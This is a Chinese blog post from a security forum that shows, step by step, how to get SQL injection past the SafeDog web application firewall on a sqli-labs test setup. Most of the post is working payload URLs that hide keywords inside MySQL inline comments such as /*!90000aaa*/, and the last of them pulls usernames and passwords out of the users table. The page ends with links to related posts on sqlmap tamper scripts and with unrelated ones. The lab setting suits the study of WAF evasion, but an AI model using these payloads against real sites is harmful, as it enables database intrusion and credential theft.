在t00ls 里面我发的,放博客分享 记录一下

小菜写文章,太菜 希望大佬放过我!

 主要分享一下,绕狗的思路
环境:windows7 + phpstudy + safedog v4.0  + Mysql 5.2

cms: sql-labs

Mysql 注释符:#  -- /**/

0x01:
注入点:http://192.168.89.132/Sql/Less-1/?id=1

先从 and 1=1 绕过

http://192.168.89.132/Sql/Less-1/?id=1' and 1=1%23

有看过一些前辈的文章,多数都是利用注释符绕过 比如用 /*xxx*/

?id=1%27and/*xxx*/1=1/*xxx*/%23 (以前 前辈的文章 xxx 进行 字符随机 绕过)

然后我就直接用前辈的怼了一下,发现安全狗拦截 

想起CTF的  SQL 函数 进行FUZZ 套路,
首先 我放了一个 and   进去

http://192.168.89.132/Sql/Less-1/?id=1' and    (安全狗不拦截)

http://192.168.89.132/Sql/Less-1/?id=1' and  1=1  (安全狗拦截) 是空格出现的问题吗?  想到之前看过的文章 把空格 替换成 /**/  或者 /*xxxx*/ 
发现依旧拦截

http://192.168.89.132/Sql/Less-1/?id=1' an1d 1=1(安全狗不拦截)  这里SQL 语句报错, (单个 放and ,单个放 xxx=xxx 安全狗并不拦截 )     在and 和 xx =xx 放在一起进行了拦截

所以把 and xx=xx  的固定格式进行扰乱  把xx=xx 看做一个整体 放在/*!*/xx=xx/*!*/ 让waf匹配不到

and/**/1=1/**/  (安全狗拦截)

and/*!*/1=1/*!*/  (安全狗不拦截)

0x02:

现在 尝试 order by

http://192.168.89.132/Sql/Less-1/?id=1' order by   (安全狗不拦截)

http://192.168.89.132/Sql/Less-1/?id=1' order by  1(安全狗拦截)

按照刚刚的思路 进行模糊测试

http://192.168.89.132/Sql/Less-1/?id=1' order b1y 1(安全狗不拦截)

http://192.168.89.132/Sql/Less-1/?id=1' ord1er by 1(安全狗不拦截)

汇总不拦截:
http://192.168.89.132/Sql/Less-1/?id=1' order by   (安全狗不拦截)

http://192.168.89.132/Sql/Less-1/?id=1' order b1y 1(安全狗不拦截)

http://192.168.89.132/Sql/Less-1/?id=1' ord1er by 1(安全狗不拦截)

现在用刚刚 绕 and 1=1 的思路  来绕 order by

http://192.168.89.132/Sql/Less-1/?id=1' /*!order*/ by 1(安全狗不拦截)
http://192.168.89.132/Sql/Less-1/?id=1' order /*!by*/ 1(安全狗不拦截)
http://192.168.89.132/Sql/Less-1/?id=1' order by /*!1*/(安全狗不拦截)
http://192.168.89.132/Sql/Less-1/?id=1' order by /*!*/1/*!*/(安全狗不拦截)

0x03:
流程:
1. 判断存在注入  绕过测试
2. 判断列           绕过测试
3. SQL查询语句  绕过测试

SQL查询语句 绕过  这里以(union select 测试)

http://192.168.89.132/Sql/Less-1/?id=1' union select   (安全狗拦截)

测试了几组

http://192.168.89.132/Sql/Less-1/?id=1' union/*!*/select/*!*/
(安全狗拦截)

http://192.168.89.132/Sql/Less-1/?id=1' union /*!select*/

(安全狗拦截)

http://192.168.89.132/Sql/Less-1/?id=1' /*!union*//*!select */(安全狗拦截)

 发现刚刚的操作 不行了  于是乎 /*!50001*/ 这样想走一波   发现也不可以  这里我就不解释/*!50001*/  大佬们都知道

因为我记得去年 第一次绕狗的时候,还截图纪念了一下 用 /*!50001*/   附一下老图:

以前绕的payload:'/*!50001union*//*!select*/user,passwor fromusers
--   (可以多看一些前辈文章,即使老的payload 绕不过去了,思路太可贵了!)

后来想了一下继续打乱的方法
/*!90000xxx*/ 这样就可以  , 这里的xxx 是不执行的    但是可以起到扰乱的效果,  也就是在基础的/*!*/ 加点料

到这里还是采用了 0x01 的思路
and/**/1=1/**/  (安全狗拦截)

and/*!*/1=1/*!*/  (安全狗不拦截)

http://192.168.89.132/Sql/Less-1/?id=1%27union/*!90000aaa*/select/*!90000aaa*/%201,2,3%23  (安全狗不拦截)
http://192.168.89.132/Sql/Less-1/?id=1%27union/*!90000aaa*/select%201,2,3%23  (安全狗不拦截)

union/*!90000aaa*/select/*!90000aaa*/from  (安全狗不拦截)
union/*!90000aaa*/select/*!90000aaa*/from users (安全狗拦截)

模糊测试拦截位置
union/*!90000aaa*/select/*!90000aaa*/from us111ers (安全狗拦截)  更改了原本users  这里是为了猜测user 是否敏感

union/*!90000aaa*/select/*!90000aaa*/fr111om users (安全狗不拦截)

猜想 from xxx 拦截?

from xxx 
(安全狗不拦截)

union/*!90000aaa*/select/*!90000aaa*/from users

union select from xxx   也就是说 union select 是一个整体 在加上 from xxx会拦截

那么我把from xxx再放起来

http://192.168.89.132/Sql/Less-1/?id=-1%27union/*!90000aaa*/select%201,2,3/*!90000aaa*//*!90000aaa*/from%20information_schema.tables/*!90000aaa*/%23(安全狗不拦截)

http://192.168.89.132/Sql/Less-1/?id=-1%27union/*!90000aaa*/select%201,username,password/*!90000aaa*//*!90000aaa*/from%20users%20limit%202,1/*!90000aaa*/%23 (安全狗不拦截)

后面写了一个安全狗的tamper

绕狗的方法还有很多,继续学习·····

安全狗其实用参数污染 绕更方便一点。

绕最新版安全狗-附上sqlmap的tamper的更多相关文章

  1. 关于sqlmap当中tamper脚本编码绕过原理的一些总结(学习python没多久有些地方肯定理解有些小问题)

    sqlmap中tamper脚本分析编写 置十对一些编码实现的脚本,很多sqlmap里面需要引用的无法实现,所以有一部分例如keywords就只写写了几个引用了一下,其实这里很多脚本运用是可以绕过安全狗 ...

  2. 使用sqlmap中tamper脚本绕过waf

    使用sqlmap中tamper脚本绕过waf 刘海哥 · 2015/02/02 11:26 0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击. 由于乌云知识库少了sqlmap- ...

  3. (四)SQLMap之Tamper篡改脚本的类型、作用、适用场景

    目录结构 一.SQLMap中tamper的简介 1.tamper的作用 2.tamper用法 二.适配不同数据库类型的测试tamper 三.SQLMap中tamper篡改脚本的功能解释 一.SQLMa ...

  4. sqlmap中tamper脚本绕过waf

    0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击. 由于乌云知识库少了sqlmap-tamper 收集一下,方便学习. 根据sqlmap中的tamper脚本可以学习过绕过一些技 ...

  5. SQLMAP之tamper详解

    sqlmap 是一款注入神器广为人知,里面的 tamper 常常用来绕过 WAF ,很实用的模块,但是却常常被新手忽略(比如我),今天就整理总结一下 tamper 的用法以及 tamper 的编写 P ...

  6. 绕过WAF、安全狗知识整理

    0x01 前言 目前市场上的WAF主要有以下几类 1. 以安全狗为代表的基于软件WAF 2. 百度加速乐.安全宝等部署在云端的WAF 3. 硬件WAF WAF的检测主要有三个阶段,我画了一张图进行说明 ...

  7. sqlmap 使用总结

    一直在用sqlmap,一直在浅层的使用方面,所以我想深入了解一下sqlmap. 参考文章: Sqlmap使用教程[个人笔记精华整理]        http://www.vuln.cn/1992 sq ...

  8. SQLMAP大全

    转自:http://blog.csdn.net/zsf1235/article/details/50974194 本人小白,初次认识sqlmap,很多都是转载资料,只是学习研究一下! 练习的网站可以用 ...

  9. 绕过D盾安全狗连接菜刀

    0x00 各种奇葩符号 现在基本上没啥用了,毕竟几年前的小玩意儿 /;.xxx.asp;.jpg /;.asp/.jpg 像这种各位看官可以忽略了,毕竟某狗和某盾也不是吃干饭的,写出来只是为了纪念一下 ...

随机推荐

  1. To making it count.

    - How do you take your caviar, sir? 鱼子酱还要吗,先生? - No caviar for me, thanks.  Never did like it much. ...

  2. What is the difference between __str__ and __repr__ in Python

    from https://www.pythoncentral.io/what-is-the-difference-between-__str__-and-__repr__-in-python/ 目的 ...

  3. Swagger UI及 Swagger editor教程 API文档搭配 Node使用

    swagger ui 是一个在线文档生成和测试的利器,目前发现最好用的.为啥好用呢?打开 demo,支持API自动生成同步的在线文档些文档可用于项目内部API审核方便测试人员了解 API这些文档可作为 ...

  4. VMware 虚拟机 linux执行 ifconfig 命令 eth0没有IP地址(intet addr、Bcast、Mask) UP BROADCAST MULTICAST 问题

    VMware 虚拟机 linux执行 ifconfig 命令 eth0没有IP地址(intet addr.Bcast.Mask) UP BROADCAST MULTICAST 问题 eth0:网络接口 ...

  5. matlab 常用函数

    Matlab常用函数 Matlab的内部常数  eps   浮点相对精度  pi  圆周率  exp  自然对数的底数e  i 或j  虚数单位  Inf或 inf  无穷大 Matlab概率密度函数 ...

  6. centos 7.2 安装mongodb 3.4.4免编译

    /根目录下: 获取命令: wget https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-3.4.4.tgz 解压命令: tar zvxf mon ...

  7. php curl请求

    multipart/form-data 方式 post的curl库,模拟post提交的时候,默认的方式 multipart/form-data ,这个算是post提交的几个基础的实现方式. $post ...

  8. Interface Comparable<T>

    Interface Comparable<T> : 该接口对实现它的每个类的对象强加一个整体排序. 这个排序被称为类的自然排序 ,类的compareTo方法被称为其自然比较方法 . 参数 ...

  9. Py西游攻关之Socket网络编程

    新闻 管理   Py西游攻关之Socket网络编程   知识预览 计算机网络 回到顶部 网络通信要素: A:IP地址   (1) 用来标识网络上一台独立的主机 (2) IP地址 = 网络地址 + 主机 ...

  10. php中trait的使用

    1.php中的trait是啥? 看上去既像类又像接口,其实都不是,Trait可以看做类的部分实现,可以混入一个或多个现有的PHP类中,其作用有两个:表明类可以做什么:提供模块化实现.Trait是一种代 ...